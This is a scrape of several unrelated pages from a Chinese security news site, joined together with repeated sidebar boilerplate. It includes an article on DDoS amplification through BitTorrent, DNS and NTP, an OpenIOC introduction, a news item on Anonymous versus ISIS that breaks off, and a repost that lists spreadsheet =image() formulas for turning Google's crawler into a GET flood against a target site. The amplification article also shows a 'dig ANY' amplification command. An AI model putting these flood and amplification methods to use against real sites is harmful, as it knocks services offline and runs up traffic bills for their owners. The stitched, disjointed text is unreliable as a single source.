工具已有 114987 人围观 ,发现 28 个不明物体
2017年Q1安卓ROOT类恶意病毒发展趋势研究报告安全报告
2017年Q1安卓ROOT类恶意病毒发展趋势研究报告
腾讯手机管家2017-05-23
Android的开源特性使得大量的厂商加入其阵营,作为当前最大的流量来源,安卓平台是黑产分子眼中的香饽饽,本文分析了2017Q1 Android平台的手机恶意应用。
安全报告终端安全已有 47608 人围观 ,发现 3 个不明物体
全球网友来晒图 | 那些被WannaCry病毒攻击感染的场景专题
全球网友来晒图 | 那些被WannaCry病毒攻击感染的场景
clouds2017-05-23
欢迎更多真实、高清、无PS、无码的大图…………
专题资讯已有 61362 人围观 ,发现 9 个不明物体
以攻防竞赛寻找“红帽”:首届广东省“红帽杯”网络攻防大赛落幕资讯
以攻防竞赛寻找“红帽”:首届广东省“红帽杯”网络攻防大赛落幕
Sphinx2017-05-22
网络安全人员应该如何培养,社会的安全意识该如何提高?本次的攻防大赛给出了可能的答案。
资讯已有 65176 人围观 ,发现 4 个不明物体
上海地区WannaCry蠕虫式勒索软件传播与危害性分析报告安全报告
上海地区WannaCry蠕虫式勒索软件传播与危害性分析报告
FreeBuf研究院2017-05-22
这份报告于5月12日-15日期间,对WannaCry及其变种在全上海的传播和影响范围、行业、地理位置等数据进行了统计和分析。
安全报告已有 61322 人围观 ,发现 7 个不明物体
内容推荐
WannaCry传播与危害性分析报告

推广
「FB专栏」内测作者招募 ( ̄3 ̄)!

有奖投稿 信息发布
  • 最新评论
  • 亮了
黑戈爾(5级)
我大概是在level 0.1左右吧 密码我都没破解成过 – -!
123123
网易的SSL登录就是个笑话:用RSA公钥加密发送给服务器,根本不是真正的SSL
五条杠(1级)
感觉除了常见的几个,其他不是很准
sarski(1级)
1楼凤姐瞩目!!!!
1455018613(3级)
楼上亮了[图]
Odin001(2级)
beats 相当于kafka 么?
leng_que(2级)
少废话,重装系统+安全加固。
小丑在嘲笑你(1级)
支持天哥!!!!!
1455018613(3级)
那岂不是很棒棒?[图]
hypo(1级)
刚接触大数据安全,收益颇多,期待后续落地方案的分享。

<a “rel=”nofollow”” class=”rc-older”>旧一点 ?

黑客制造

  • 利用micropython快速实现Badusb及手机摇控扩展利用micropython快速实现Badusb及手机摇控扩展

    利用micropython快速实现Badusb及手机摇控扩展

  • Prev
  • Next

最新作者

更多

Lolopop
《PinDemonium通用动态脱壳工具》
SetRet
《高通(Qualcomm)LK源码深度分析》
bigface
手拿蚁剑,乘着巡风,干下这碗msf
《没有钱的安全部之系统日志安全》
李小明??
欢迎关注微信公众号: 星雨小院 id…
《分享“永恒之蓝(MS17-010)”批量远程检测工具》
Shun
Blog:www.shungg.cn …
《开源扫描仪的工具箱:安全行业从业人员自研开源扫描器合集》
银科控股
银科控股-NASDAQ:YIN
《银科控股(纳斯达克上市公司)勾搭信息安全人员、渗透测试人员(上海)》

最新话题

开源扫描仪的工具箱:安全行业从业人员自研开源扫描器合集

开源扫描仪的工具箱:安全行业从业人员自研开源扫描器合集

Shun 推荐:

Scanners-Box是来自github平台的开源扫描仪的集合,包括子域枚举,数据库漏洞扫描程序,弱密码或信息泄漏扫描仪,端口扫描仪,指纹扫描仪和其他大型扫描仪

共建栏目

FreeBuf共建栏目,通过与企业、政府及相关单位共享前沿信息,出品最具专业性的内容

不容错过

  • [Blackhat]2014美国黑帽大会有哪些精彩的议题?FB情报组2014-08-07
  • 如何基于菜刀PHP一句话实现单个文件批量上传?安全小飞侠2015-12-28
  • FreeBuf公开课:Wi-Fi安全与渗透测试(第一集)FB视频2015-03-25
  • Hacking Team流量攻击之EXE攻击分析LiukerTeam2016-01-23

服务推荐

订阅周刊订阅周刊

安全报告安全报告

寻求报道寻求报道

视频推荐

更多

【FreeBuf视频】《安全大咖说》专访阿里云云计算安全事业部资深总监肖力

FIT 2016集锦 | 线性资本王淮:我们为什么会投资安全领域?

滑板也被黑:蓝牙劫持智能滑板运行【FreeBuf视频】

FreeBuf公开课?BlackHat中文视频系列:对社会工程学电话欺诈事件的大数据分析

合作伙伴

  • 支付宝|
  • 腾讯TSRC|
  • 知道创宇|
  • 虎嗅网|
  • HITCON|
  • OWASP中国|
  • ISF|
  • ISC|
  • SYSCAN360|
  • SCANV|
  • xKungFoo|
  • 知乎日报|
  • 15pb|
  • GeekPwn|
  • SegmentFault|
  • 亚洲诚信|
  • 岂安科技|
  • 同盾|
  • i春秋|
  • 微众银行|
  • 合天网安实验室

css.php

正在加载中…

0daybank

geekpwn

geekpwn

投稿
标题
时间
操作
黑客Geohot:无惧大厂,民科也能研发“无人驾驶” 资讯
2016-10-29
查看
群星闪耀GeekPwn嘉年华,部分顶级黑客行踪曝光 活动
2016-10-10
查看
控制 or 被控制? 这可能是2016年最值得期待的极客盛会 活动
2016-09-27
查看
如何证明你是“比特币之父”中本聪? 资讯
2016-04-14
查看
供应链安全问题再现:一个药品管理系统怎么会有1400个漏洞? 漏洞系统安全资讯
2016-04-04
查看
中国黑客在Pwn2Own 2016上是怎样一种存在? 资讯
2016-03-17
查看
阿里巴巴最新发布的企业安全产品究竟是啥? 资讯
2016-02-26
查看
外媒质疑美国安局(NSA)天网,或已误杀千人 网络安全资讯
2016-02-19
查看
法官要求苹果公司协助FBI解锁手机,库克表示会上诉! 数据安全终端安全资讯
2016-02-18
查看
隔墙有耳:黑客可以“听到”离线计算机的密钥 数据安全终端安全资讯
2016-02-17
查看
深度学习:能击败欧洲围棋冠军,还能防恶意软件 网络安全
2016-02-16
查看
领跑全球安全行业,为什么是以色列? 头条
2016-01-31
查看
仿生免疫系统将左右网络安全的未来? 观点
2016-01-02
查看

css.php

正在加载中…

0daybank

放大

放大

投稿

浅析各类DDoS攻击放大技术

月尽西楼2015-08-26294549人围观 ,发现 10 个不明物体网络安全

FreeBuf曾报道过,BT种子协议家族漏洞可用作反射分布式拒绝服务攻击(DRDoS attacks)。此种攻击方式并非主流,以公开的论文看来效果堪比DNS,而NTP攻击则更胜一筹。

0×00 背景

攻击者可以利用BT种子协议(微传输协议[uTP],分布hash平台[DHT],消息流加密[MSE],BT种子同步[BTSync])来反射放大结点间传输量。

实验显示,攻击者可以利用BT结点将一个包放大50倍,如果是BTsync将达到120倍。另外,我们发现最流行的BT流客户端正是最脆弱的,比如uTorrent、Mainline、Vuze等。

公开DNS解析和NTP协议MONLIST命令攻击,两种攻击方法依靠其协议的广泛应用,影响范围不言而喻。

混合放大,利用通用协议的攻击方式很稳定,通过标准的结点发现机制很快找到放大点。由于其利用的动态端口范围和握手加密,攻击不会被常规防火墙发现,只有进行深度的包检查才能发现。

0×01 什么是DRDoS攻击

攻击者不把通信包直接发给受害者,而是发给放大器(amplifiers)然后反射给受害者。攻击者利用了网络协议漏洞进行IP欺骗。可以由一个或多个攻击结点开始,下图简单勾画出了DRDoS的攻击模型:

1、P点在攻击前确认放大器的位置,这取决于攻击者利用的协议,强大的扫描工具比如?ZMap可以帮助确认可用放大器。这步是以后步骤的基础,保证以后的攻击效率;
2、接着发送小的Ba?给放大器PA,攻击者伪造包源地址是PV的IP地址,然后PA反馈一个大的包Bv给PV。

BT流是今天世界最常用的P2P协议,协议的新颖之处在于解决了free riding problem 和 last piece problem 。为了克服第一个困难,BT流应用了一个奖赏机制称为窒息算法导致了tit-for-tat-ish 分享方法。BT流通过稀有片优先算法解决了第二个问题。

0×02 UTP协议攻击

最初,TCP是握手和节点通信的默认协议。TCP在P2P环境有很多优点,它分布了可用带宽给每个连接点,通常得到比其他应用更多的带宽。因此,BT流在后台运行,会被前段的通信结束(例如web 和邮件),所以BT流发明了新的传输协议UTP。

UTP采用了TCP的一些想法,以滑动窗口控制流,按顺序校验信息的完整性,握手建立连接。不同于TCP三次握手,UTP只有两次握手,下图表示结点建立连接的过程。可以看出创建方发出一个ST_SYN包给接受方创建连接,类似于TCP的SYN包。接受方反馈ST_STATE包表示成功接收到,建立方接收到反馈表示双向建立成功。现今大多数的BT客户端把UTP作为默认协议。

UTP建立连接的两次握手,这允许攻击者用伪造的IP地址和放大器建立连接,因为接受方不检查创建方是否接收到了应答。

示意图如下:

一个伪造的带着受害者IP地址的ST_DATA给接收方,接收方相信包中的源IP地址有效,反馈了第一个ST_DATA给受害者,而受害者的IP没有意料到这个包,所以也不会回应它。接收方到时间重传丢失的ST_DATA包,如果连续四次传输未响应则断开连接。

连接建立后BT流需要一次握手作为第一条信息,包括了为扩展保留的字节、hash信息和节点ID。如果客户端接受了握手发现使用了未认证的hash,客户端立刻终结连接。攻击者利用握手包基于UTP两次握手创建放大攻击。

ab两步不赘述了,c步骤 攻击者发送了一个装载了BT流握手信息的ST_DATA包。 这个握手需要活跃的放大器种子hash信息(20字节),握手包最少88字节,如果放大器参与这个种子中,就会反馈步骤d ,d的握手包大于攻击者发送的,因为客户端在UTP包里放入了更多信息。

BT流提供Libtorrent 的扩展协议(LTEP)添加新的扩展而不妨碍默认协议。如果一个攻击者标记支持LTEP 尤其在BEP10中 ,攻击效果会进一步放大而不用增加步骤c握手包的量。对等节点以此扩展信息交换。

0×03 利用数据流加密握手包(MSE)攻击

MSE的目的是混淆BT传输过程,防止受ISP的影响,而不是为了传输安全。尽管它有很多严重的弱点,但它还是被大多数BT客户端使用。

这个协议开始于Diffie-Hellman 密钥的交换 每个节点都产生了768位的公钥 公钥包括0-512位的随机数r 。交换密钥后,包会被RC4算法加密,UTP传输。

这种方法使攻击者不必明确hash信息,发送一个伪造的MSE包(包括768位的公钥没有随机数),客户端随即会反馈随机数和公钥。

结果证明MSE攻击会显著提升效率。进一步说,加密装载Ba和MSE生成的包Bv,熵高的属性,使其难以被ISP或者DPI防火墙发现并封锁。

0×04 深入DNS放大DDoS攻击

DNS反射攻击也能轻易达到千兆的级别。

最初的放大攻击是著名的SMURF攻击,发送ICMP请求给路由网络广播地址,配置发送ICMP给路由下的设备。攻击者欺骗ICMP请求源是受害者的IP,因为ICMP不包括握手,所以目标无从确认源IP是否合法。攻击者放大攻击的效果取决于路由下有多少设备。 不过SMURF攻击是过去的事了,网络管理员已经配置它们的路由器不将ICMP请求发给网络广播地址。

好的放大攻击方法有两个条件:

1、协议没有握手,允许IP源地址伪造(例如ICMP,UDP)
2、对查询的回复要大于查询本身

DNS是核心,无处不在的网络平台就是放大攻击的资源。

DNS基于UDP传输,因此它们的源地址可以伪造并且接收者回应前无从确定真实性。DNS也可以生成更大的反馈,输入? dig ANY www.baidu.com @x.x.x.x(x.x.x.x是公开DNS解析器),这是一个64字节的查询会返回3223字节,攻击效果放大了50倍。讽刺的是,huge DNSSEC 密钥 ——这个被用来增加DNS系统安全性的协议反而成了放大攻击的帮凶。

公开DNS解析器是互联网的悲剧。

如果你用一个DNS解析器确保只返回可信用户的查询,例如你公司的IP空间是10.10.10.0/24 DNS解析器就只返回这个范围IP的查询,而不会回应6.6.6.6的查询信息。

问题就在于许多人运行DNS解析器而不在乎哪个IP地址的人查询。这样的问题已经存在10年之久,发生的事件表明很多不同的僵尸网络为了发现DNS解析器开始枚举互联网IP空间,一旦发现就可利用于DNS放大攻击。中国台湾拥有世界第二多的公开DNS解析器资源。

有这样一个网址可以查询你的DNS? http://openresolverproject.org/

世界上有2170万个公开DNS解析器,网站正致力于关闭它们。

解决办法

把recurison设置为no?
允许在特定的地址查询,options?{??allow-query{192.168.1.0/24;};};

0×05 NTP 放大DDoS攻击 400Gbps的技术细节

2014年2月出现一次400Gbps规模的NTP攻击,这类攻击越来越走俏,这次事件可以作为一个好的例子来说明一下这种攻击方法。

首先了解一下基础的结构,NTP放大攻击开始于一个被黑客控制的服务器允许IP欺骗,攻击者生成了很多UDP包欺骗源IP地址使来自特定目标的包出现,这些UDP包发送到支持MONLIST命令的网络时间协议服务器port123。

顺便聊一聊MONLIST命令

它的用处在于返回一个NTP服务器上600个IP地址的列表,所以它可以拿来干坏事。如果一个NTP服务器完全迁移它的表,反馈的信息将被放大206倍。此类攻击中IP地址伪造,UDP不需要握手,理论上有200倍的放大效果。

然而这不仅仅是理论,此次攻击事件中,为了400Gbps的攻击效果攻击者应用了运行在1298个不同网络上的4529台NTP服务器。平均每台NTP服务器产生87Mbps的通信量。值得注意的是攻击者很可能只用了一个能IP欺骗的网络服务器就做成了此次攻击。

NTP服务器支持MONLIST和公开DNS解析器不一样,虽然它们都趋向于多网络连接的服务器。对比而言,NTP 攻击更加的效率,2013年曾有一次几乎玩坏互联网的DDoS攻击被纽约时报报道,利用30956公开DNS解析器,目标Spamhaus产生300Gbps的通信量。NTP攻击只用了1/7的服务器,实现的攻击效果还比Spamhaus事件多1/3。

解决办法:禁止MONLIST命令

黑客攻击的前提是IP地址欺骗,如果你在管理网络,确保遵守BCP38。可以用这个来自MIT的工具检测一下http://spoofer.cmand.org/summary.php

最后如果你觉得NTP不好,那就等待下一个SNMP,但是SNMP理论上有650倍的放大效果,已经看到有黑客跃跃欲试了,Buckle up。

参考资料

https://blog.cloudflare.com/the-ddos-that-almost-broke-the-internet/

https://blog.cloudflare.com/deep-inside-a-dns-amplification-ddos-attack/

https://www.usenix.org/system/files/conference/woot15/woot15-paper-adamsky.pdf

*作者:月尽西楼,本文属FreeBuf原创奖励计划,未经许可禁止转载

这些评论亮了

  • nickchang(4级)回复
    还可以用SIP来反射 ?
    http://link.springer.com/chapter/10.1007%2F978-3-642-13241-4_14
    )10(亮了
  • 我是酱油男(4级)回复
    “浅析各类DDoS攻击放大技术 ”。。。。你这各类。。。。明显帽子大头小呀~~~
    )8(亮了
  • Fiend520(7级)回复
    这个,一大波DDos来袭
    )8(亮了
  • 月尽西楼(5级)桃李春风一杯酒回复
    @ andy88? 谢谢 共同进步
    )8(亮了
  • 月尽西楼(5级)桃李春风一杯酒回复
    @ nickchang? 谢谢提供 可以考虑翻出来 ?
    )7(亮了
发表评论

已有 10 条评论

  • andy88?(5级)我相信我加入互联网,就是我未来的路、希望有大神关注http:…?2015-08-26回复1楼

    写的非常的棒棒哒 ,真心感谢作者让我技术提升更近的一步,。

    亮了(6)
    • 月尽西楼?(5级)桃李春风一杯酒?2015-08-26回复

      @ andy88? 谢谢 共同进步

      亮了(8)
  • 我是酱油男?(4级)?2015-08-26回复2楼

    “浅析各类DDoS攻击放大技术 ”。。。。你这各类。。。。明显帽子大头小呀~~~

    亮了(8)
    • 月尽西楼?(5级)桃李春风一杯酒?2015-08-26回复

      @ 我是酱油男? 确实有一点 先说主流嘛 水平有限 :oops:

      亮了(7)
  • Fiend520?(7级)?2015-08-26回复3楼

    这个,一大波DDos来袭

    亮了(8)
  • nickchang?(4级)?2015-08-26回复4楼

    还可以用SIP来反射 :)

    http://link.springer.com/chapter/10.1007%2F978-3-642-13241-4_14

    亮了(10)
    • 月尽西楼?(5级)桃李春风一杯酒?2015-09-11回复

      @ nickchang? 谢谢提供 可以考虑翻出来 :oops:

      亮了(7)
  • davie80?(3级)?2015-09-08回复5楼

    作者把这个系列做下去啊。。。。。

    亮了(7)
    • 月尽西楼?(5级)桃李春风一杯酒?2015-09-11回复

      @ davie80? 嗯嗯 参考下楼上给的文档 :mrgreen:

      亮了(7)
  • jintianlu?(1级)信安狗。?2015-12-29回复6楼

    想要自己发包向ntp服务器发送monlist命令,应该发送什么样的icmp数据包?

    亮了(0)
表情插图

取消

月尽西楼

月尽西楼

桃李春风一杯酒

13 篇文章51 条评论

相关阅读

  • 可视化DDoS全球攻击地图
  • 绿盟科技分析报告:DDoS兵器谱2014Q1版
  • 黑客开发对Healthcare.gov发动拒绝服务攻击的软件
  • GitHub再遭DDoS攻击,Shadowsocks开发者被喝茶
  • 两年内赚到60万美元?走近以色列在线攻击服务vDOS

特别推荐

关注我们 分享每日精选文章

不容错过

  • [Blackhat]2014美国黑帽大会有哪些精彩的议题?FB情报组2014-08-07
  • 如何基于菜刀PHP一句话实现单个文件批量上传?安全小飞侠2015-12-28
  • FreeBuf公开课:Wi-Fi安全与渗透测试(第一集)FB视频2015-03-25
  • Hacking Team流量攻击之EXE攻击分析LiukerTeam2016-01-23

css.php

正在加载中…

0daybank

ioc

ioc

投稿

梦回大宋 – 安全事件共享构想之OpenIOC

0052013-11-01129624人围观 ,发现 7 个不明物体其他

corporate

10月27日,@wulujia 发表了一个《腾讯安全技术峰会侧记》的围脖,提到了和@宫一鸣 讨论到组建“安全事件共享”的构想,引起了各方的积极讨论。里面谈及“通过project形式?比如黑IP池?”等等。于是今天便有这篇班门弄斧的OpenIOC介绍了。大名鼎鼎的Mandiant就是使用它进行安全事件“描述”以及“共享”信息内容的。只可惜它不和大宋国玩。下面回归正文:
安全事件调查人员在安全事件应急响应过程中面临的其中一个挑战是,找一个有效的方法把所有调查过程中的信息组织起来,这些信息包括攻击者的活动、所用的工具、恶意软件、或者其他的攻击指示器(indicators of compromise),简称IOCs,而OpenIOC格式(OpenIOC is designed to fill a void that currently exists for
organizations that want to share threat information both internally and?externally in a machine-digestible format.)正好可以解决这个难题。OpenIOC可提供一个标准的格式和术语来描述调查事件中遇到的分析结果,以便在不同组织间进行共享。

在开始下面的介绍前,需要澄清的是IOCs不是一个签名(signatures),所以不是要实现signature的功能。它设计出来是用于帮助你的调查,或者其他人的调查,这些人是你与之共享威胁情报的人。

下面列举几个最常见的IOC用例:

  • 恶意软件/工具型:

这是最常见的用例,本质上讲,这种类型的IOC可用于发现某些已知类型的恶意软件或恶意工具,通常通过查找二进制文件或其文件属性,或其执行时创建的特征,例如一些预读文件、注册表键值等。

  • 方法论型:

不同于上一种可直接识别恶意软件/工具,这种类型的IOC为了生成一些调查的线索,让你可以发现你不一定知道的东西。例如,如果你想识别出任何没有经过签名,而且从任何在“windows\system32”目录外加载的DLL,那你就可以写一个IOC去描述这个条件。另一个比较好的“方法论IOC”例子就是查找注册表中所有“Run”键值内容结尾为“.jpg”,这个IOC代表了一种不正常的情况,在安全调查中就指示出很可能是一个已被恶意利用了的证据。

  • “袋装”型:

你可能已经在使用这种IOC,很多组织会订阅一些威胁情报,这些订阅的feed通常会投递一些MD5或者ip地址列表,一“袋装”的IOC可以代表这些入侵指示器(indicator)的一个集合。这种类型的IOC非黑即白,通常在调查事件中用于准确匹配的话会比较好。

  • 调查case型:

当你在环境里面调查可疑的系统时,识别出一些恶意的活动证据,例如关于安装了后门、执行了恶意工具、文件已被窃取等等的元数据时,你就可以在一个IOC里面跟踪到这些信息。这类IOC跟“袋装”型IOC有点类似,然而调查型IOC只包括一个调查事件中的指示器,这种类型的IOC可以帮助你区分哪些系统需要优先去调查。

下面在介绍一下IOC的组件:
一个IOC通常由三个部分组成,分别是IOC元数据部分参考部分以及定义部分。下面使用Mandiant的IOC编辑器来了实际了解一下这些组成部分。

  • 元数据:

IOC元数据描述了以下信息,例如本IOC的名称(Evil.exe[BACKDOOR])、作者(jsmith@domain.tld)以及简述

  • 参考:

在IOC的参考里面,可以有调查事件的名称或者case编号,IOC成熟度的评论和信息(例如Alpha, Beta,Public Release等等)这些信息有助于你理解这个IOC适合放到你的威胁情报库中的什么位置。这个参考字段通常的用法是用于把IOC关联到特定的威胁组织(好比如APT1)。当于第三方共享IOC信息时,删除特定的参考字段的做法并不常见。

  • 定义:

这是IOC的核心内容了,包括了调查人员决定编写IOC的关键内容。例如,可能包括一个文件的MD5值,注册表路径或一些在进程内存中发现的线索,所谓的指示器(indicator)会列在这个定义字段里,或者组合到表达式里面,这些表达式通常由两个术语和一些布尔型逻辑符组成。OpenIOC的其中一个特性令它特别有用,就是它可简单的组合一些and,or的逻辑条件判断符。

下面举例看看这些逻辑判断条件如何运用。

1.服务名为"MS 1atent time services" or
2.任何含有DLL调用名为evil.exe的服务 or
3.文件名是“bad.exe” AND 其文件的大小在4096-10240-bytes之间。

AND代表表达式两边都必须为真
OR代表表达式两边只需要一边为真

理解清楚这个AND OR的关系就可以明白,用上面的例子来匹配IOC时,并不是一个if-else的声明,也不是都必须存在。在安全事件调查中,如果发现一个名为“MS 1atent time services”的服务,那这个IOC就匹配上了,而不管IOC所描述的恶意文件是否在这台主机上出现。

更多有关OpenIOC的介绍,请参考http://www.openioc.org/

Mandiant的IOC编辑器可从这里下载:http://www.mandiant.com/resources/download/ioc-editor/

最后,期待安全界前辈们早日建起大宋国的安全事件共享环境。

这些评论亮了

  • xti9er(2级)回复
    好事,顶起。
    一线搞安全建设的会懂他的价值
    )7(亮了
  • m0zh3(1级)回复
    这个还得大佬们来推,但不见得大佬们肯推。
    )7(亮了
发表评论

已有 7 条评论

  • 夜未央?(4级)?2013-11-01回复1楼

    楼主是想搭建一个平台?

    亮了(4)
  • xti9er?(2级)?2013-11-01回复2楼

    好事,顶起。
    一线搞安全建设的会懂他的价值

    亮了(7)
  • m0zh3?(1级)?2013-11-01回复3楼

    这个还得大佬们来推,但不见得大佬们肯推。

    亮了(7)
  • 宫一鸣cn?2013-11-01回复4楼

    MANDIANT开源出来的东西,不过不是很活跃,2011年到现在google讨论组总共才24个讨论条目。另外一方面就我看到的国外组织不care格式, 非机器的人与人的交互只要share的数据有货,格式再烂也有人看有人研究…//: 点评一下?

    亮了(3)
  • 古道安全?2013-11-01回复5楼

    这个不错啊

    亮了(2)
  • 酒无而七?2013-11-01回复6楼

    以你的经验看,拿到这些数据,能否在企业内捞一把,发现类似的攻击行为,识别出潜伏的威胁呢?也就是这些数据能发挥出作用没?看国外的理论介绍,这方法还是不错,就是不知道实际效果。

    亮了(4)
  • whitemonty?(4级)这家伙很懒,就是不肯写个人说明!?2013-11-02回复7楼

    推吧推吧。。。
    慢慢推,从国家版推到国际版
    虽然这没有推油那么容易推广
    路漫漫其修远兮……

    亮了(2)
表情插图

取消

005

005

欢迎关注微信公众号:zsfnotes

4 篇文章0 条评论

相关阅读

  • 2013年度最为重大的网络攻击
  • 抵御勒索软件真的很难吗?
  • FDA发布预警称医疗系统面临网络安全威胁
  • Javascript间谍脚本分析:Web恶意程序Scanbox源码分析与演示
  • 浅析基于态势感知的网络安全事件预测方法

特别推荐

关注我们 分享每日精选文章

不容错过

  • [Blackhat]2014美国黑帽大会有哪些精彩的议题?FB情报组2014-08-07
  • 如何基于菜刀PHP一句话实现单个文件批量上传?安全小飞侠2015-12-28
  • FreeBuf公开课:Wi-Fi安全与渗透测试(第一集)FB视频2015-03-25
  • Hacking Team流量攻击之EXE攻击分析LiukerTeam2016-01-23

css.php

正在加载中…

0daybank

爬虫

爬虫

投稿

利用Google爬虫DDoS任意网站

Taskiller2014-03-11+4418412人围观 ,发现 20 个不明物体WEB安全网络安全

提醒:以下内容仅供安全测试及教学参考,禁止任何非法用途

Google的FeedFetcher爬虫会将spreadsheet的=image(“link”)中的任意链接缓存。

例如:

如果我们将=image(“http://example.com/image.jpg”)输入到任意一个Google spreadsheet中,Google就会“派出”FeedFetcher爬虫去抓取这个图片并保存到缓存中以将其显示出来。

但是,我们可以为文件名附加上随机参数,使FeedFetcher多次抓取同一文件。也就是说,如果一个网站有一个10MB的文件,要是将以下列表输入到Google spreadsheet中,那么Google的爬虫就会抓取该文件1000次。

=image("http://targetname/file.pdf?r=0")
=image("http://targetname/file.pdf?r=1")
=image("http://targetname/file.pdf?r=2")
=image("http://targetname/file.pdf?r=3")
...
=image("http://targetname/file.pdf?r=1000")

附加上随机参数后,每个链接都被看作是不同的链接,因此Google爬虫会去抓取多次,使网站产生大量出站流量。所以任何人只需使用浏览器并打开一些标签,就可以向web服务器发动巨大流量HTTP GET洪水攻击。

但是这种攻击使攻击者根本不需要有多大的带宽,只需要将“图像”地址输入进spreadsheet,Google就会从服务器上抓取这个10MB的数据,但是因为地址指向一个PDF文件(非图像文件),攻击者从Google得到的反馈为N/A。很明显这种类型的流量可以被放大多倍,引起的后果很可能是灾难性的。

只需要使用一台笔记本,打开几个web标签页,仅仅拷贝一些指向10MB文件的链接,Google去抓取同一文件的流量就超过了700Mbps。而这种600-700Mbps的抓取流量大概只持续了30-45分钟,我就把服务器关闭了。如果没算错的话,45分钟内大概走了240GB的流量。

我和我的小伙伴被这么高的出站流量惊呆了。如果文件再大一点的话,我想其出站流量可以轻易达到Gpbs级,而且进站流量也能达到50-100Mbps。可以想象如果多个攻击者同时用这种方法攻击某个网站的话,流量能有多少了。同时由于Google用会多个IP地址进行抓取,所以也很难阻止这种类型的GET洪水攻击,而且很容易将攻击持续数个小时,因为这种攻击实在是太容易实施了。

发现这个bug后,我开始搜索由其产生的真实案例,还真发现了两例:

第一起攻击案例解释了博主如何不小心攻击了自己,结果收到了巨款流量账单。另一篇文章《利用Spreadsheet作为DDoS武器》描述了另一个类似攻击,但指出攻击者必须先抓取整个网站并用多个帐户将链接保存在spreadsheet中。

不过奇怪的是没有人尝试用附加随机请求变量的方法。尽管只是目标网站的同一个文件,但通过这种添加随机请求变量的方法是可以对同一文件请求成千上万次的,后果还是挺吓人的,而且实施过程很容易,任何人只需要动动手指头拷贝一些链接就可以做到。

我昨天将这个bug提交给了Google,今天得到了他们的反馈,表示这不属于安全漏洞,认为这是一个暴力拒绝服务攻击,不在bug奖金范围中。

也许他们事前就知道这个问题,并且认为这不是bug?

不过即使拿不到奖金,我仍希望他们会修复这个问题,由于实施门槛低,任何人都可以利用Google爬虫发动这种攻击。有一种简单的修复方法,就是Google只抓取没有请求参数的链接。希望Google早日修复这个bug,使站长免受其带来的威胁。

原文地址:http://chr13.com/2014/03/10/using-google-to-ddos-any-website/

这些评论亮了

  • 马大帅回复
    国外貌似有专门的DDOS攻击测试平台,还能包月。不知道哪位大神知道啊?知道的希望回复下谢谢。
    )16(亮了
  • MeirLin(5级)研表究明,汉字的序顺并不定一能影阅响读,比如当你看完这句话后…回复
    原来还可以这样。
    )9(亮了
发表评论

已有 20 条评论

  • MeirLin?(5级)研表究明,汉字的序顺并不定一能影阅响读,比如当你看完这句话后…?2014-03-10回复1楼

    原来还可以这样。

    亮了(9)
  • ZMOM1031?(3级)?2014-03-11回复2楼

    利用Google机器人攻击别人的网站的文章,我几个月前就看到过了

    亮了(2)
    • init5?(3级)招商银行安全员?2014-03-11回复

      @ZMOM1031? you say j13 without a picture

      亮了(5)
      • 委员长?2014-03-11回复

        @init5? 国外早就有了,我当初看的是这篇文章:http://www.infosecisland.com/blogview/21162-Google-as-a-Cyber-Weapon-New-Attack-Method-Discovered.html

        另外:google搜索GOOGLE BOT DDOS FEEDFATCHER,能出很多文章

        亮了(4)
  • 严妹妹脸圆圆?2014-03-11回复3楼

    亮了(2)
  • PaintorYu?2014-03-11回复4楼

    转发微博

    亮了(2)
  • 带脚镣跳舞?2014-03-11回复5楼

    亮了(2)
  • honey?2014-03-11回复6楼

    omfg

    亮了(1)
  • 年轻的轻年?2014-03-11回复7楼

    这个赞

    亮了(2)
  • RadioY?(1级)Learning Radio….?2014-03-12回复8楼

    nICE =.=

    亮了(2)
  • forxy?(1级)?2014-03-12回复9楼

    NB

    亮了(1)
  • 向杨老巢?2014-03-12回复10楼

    转发微博

    亮了(2)
  • 刘吉威大姑娘?2014-03-13回复11楼

    转发微博

    亮了(3)
  • 18岁的丽佳peace?2014-03-13回复12楼

    转发微博

    亮了(2)
  • 戈为湘10?2014-03-15回复13楼

    转发微博

    亮了(1)
  • 295CP最高没之1成仁1986?2014-03-17回复14楼

    转发微博

    亮了(1)
  • 晓易?2014-06-26回复15楼

    这不和360云盘一样么?C用A服务器作傀儡攻击B服务器。

    亮了(3)
  • 马大帅?2014-11-27回复16楼

    国外貌似有专门的DDOS攻击测试平台,还能包月。不知道哪位大神知道啊?知道的希望回复下谢谢。

    亮了(16)
  • 原始猫?2015-08-09回复17楼

    @ 马大帅 1702020170

    亮了(2)
  • naodii?2016-04-15回复18楼

    要说 ddos攻击 我们GFW直接全都解析一个地方去 所向披靡

    亮了(4)
表情插图

取消

Taskiller

Taskiller

这家伙太懒,还未填写个人描述!

29 篇文章14 条评论

相关阅读

  • 通过DNS AAAA记录和IPv6地址传输后门有效载荷
  • Google Hacking:教你找女神
  • QADARS V3恶意软件域名生成算法分析
  • 安全科普:密码学之碰撞攻击
  • 社工与社工库的那些事

特别推荐

关注我们 分享每日精选文章

不容错过

  • [Blackhat]2014美国黑帽大会有哪些精彩的议题?FB情报组2014-08-07
  • 如何基于菜刀PHP一句话实现单个文件批量上传?安全小飞侠2015-12-28
  • FreeBuf公开课:Wi-Fi安全与渗透测试(第一集)FB视频2015-03-25
  • Hacking Team流量攻击之EXE攻击分析LiukerTeam2016-01-23

css.php

正在加载中…

0daybank

isis向中国宣战

isis向中国宣战

投稿

[更新中文视频]黑客组织Anonymous向ISIS宣战

dawner2014-10-08+5621864人围观 ,发现 52 个不明物体视频资讯

2014/10/08 更新视频(中文字幕)

本视频由FB视频组出品 ?优酷链接

2014/9/30

全美第一的黑客组织?匿名者(Anonymous)近日站出来声称ISIS(伊斯兰教激进分子)劫持了伊斯兰教。Anonymous已经发起了一场社会媒体宣传运动,希望与之对抗。

ISIS冰行动

“ISIS冰行动”,正如该运动所自称的那样,其所作所为旨在保护那些在网络与现实之中毫无自保能力的大众。

其中有个穿组织标志(Anonymous)的名为福克斯的小伙,在“Tech 24”节目上告诉France24的记者,发起该运动的目的其实有两个:

1.强调ISIS带来的威胁。
2.向公众证明ISIS并不代表,也不掌有穆斯林信仰的真谛。

“我们需要公众了解伊拉克的情势是多麽严峻。在主流媒体报道ISIS的威胁之前,我们是头一个通过向Youtube上传视频,给公众宣传ISIS的由来和作为的。我们也曝光了美国政府的默认不指责行为,这直接或间接地导致了我们今天所看到的危机。”

“第二个原因,我们需要认清公众之敌ISIS,他们并不代表伊斯兰教。我们已经多次看见在某些团体打着伊斯兰教的旗号时,制造的混乱和仇恨。我们决心不再让这种事情再次发生,穆斯林和基督教徒都是这场灾难的受害者,我们准备倾力面对这个问题带来的任何后续影响。”他补充道。

Anonymous的警告

